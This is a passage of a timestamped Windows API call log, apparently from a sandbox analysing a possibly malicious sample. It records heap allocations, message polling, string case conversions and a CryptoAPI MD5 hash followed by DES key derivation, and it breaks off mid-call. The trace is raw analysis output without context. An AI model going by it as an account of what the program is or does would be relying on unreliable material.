[0264.355] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0264.355] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.355] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0264.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0264.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0264.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0264.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0264.356] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0264.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0264.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0264.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0264.356] CryptCreateHash (in: hProv=0xad2be8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0264.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0264.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0264.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0264.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0264.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0264.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0264.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0264.357] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0264.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0264.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0264.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0264.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0264.357] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.357] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0264.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0264.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0264.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0264.358] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0264.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0264.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0264.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0264.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0264.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0264.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0264.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0264.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0264.359] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0264.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0264.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0264.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0264.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0264.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0264.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0264.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0264.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0264.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0264.359] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0264.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0264.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0264.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0264.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0264.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0264.360] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0264.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0264.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0264.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0264.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0264.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0264.360] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.361] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0264.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0264.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0264.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0264.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0264.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0264.361] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.361] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.361] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0264.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0264.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0264.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0264.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0264.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0264.362] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0264.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0264.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0264.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0264.363] CryptHashData (hHash=0xaa5820, pbData=0x34a2080, dwDataLen=0x3, dwFlags=0x1) returned 1 [0264.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0264.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0264.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2130 [0264.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0264.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0264.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0264.363] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0264.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0264.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0264.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0264.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0264.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0264.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0264.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0264.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0264.364] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.364] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0264.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0264.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0264.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0264.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0264.365] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.365] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.365] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.365] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.365] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.365] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0264.365] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.366] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0264.366] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.366] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.366] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.366] CryptDeriveKey (in: hProv=0xad2be8, Algid=0x6601, hBaseData=0xaa5820, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5860) returned 1 [0264.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0264.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0264.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0264.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0264.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0264.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0264.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0264.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0264.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0264.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0264.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0264.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0264.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0264.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0264.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0264.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0264.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0264.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0264.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0264.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0264.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0264.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0264.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0264.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0264.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0264.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0264.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0264.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0264.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0264.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0264.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0264.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0264.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0264.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0264.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0264.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0264.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0264.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0264.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0264.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0264.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0264.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0264.371] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0264.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0264.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0264.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0264.372] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0264.372] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0264.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0264.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0264.373] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0264.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 